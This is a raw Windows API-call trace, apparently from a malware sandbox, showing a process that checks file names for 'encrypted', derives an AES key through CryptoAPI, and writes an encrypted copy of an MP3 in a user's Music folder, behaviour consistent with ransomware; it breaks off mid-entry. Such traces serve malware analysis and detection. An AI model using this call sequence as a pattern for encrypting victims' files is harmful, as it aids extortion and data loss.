CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KS4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oSCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SCes8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ces8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.127] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.127] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.127] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="__Hn.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.127] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.127] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0038.127] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.127] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.127] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.127] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.127] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.127] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.127] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.127] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.127] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.127] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.127] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac52da0, ftCreationTime.dwHighDateTime=0x1d5c0fa, ftLastAccessTime.dwLowDateTime=0x2339e1c0, ftLastAccessTime.dwHighDateTime=0x1d5be98, ftLastWriteTime.dwLowDateTime=0x2339e1c0, ftLastWriteTime.dwHighDateTime=0x1d5be98, nFileSizeHigh=0x0, nFileSizeLow=0x16f92, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="__Hn.mp3", cAlternateFileName="")) returned 0x7c2240 [0038.128] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.128] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.128] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.128] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0038.128] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0038.128] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.128] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.128] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0038.129] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0038.129] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.129] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.129] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.129] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.129] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.129] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.129] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.129] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.129] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.129] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.129] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.129] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.130] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.130] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0038.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.130] CryptDestroyHash (hHash=0x7c2100) returned 1 [0038.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0038.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.130] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\__hn.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.130] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.130] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.131] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.131] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.131] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0038.132] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f")) returned 0x10 [0038.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0038.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0038.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.133] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.encrypted.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\__hn.encrypted.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0038.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0038.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.133] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.133] RtlAllocateHeap (HeapHandle=0x770000, 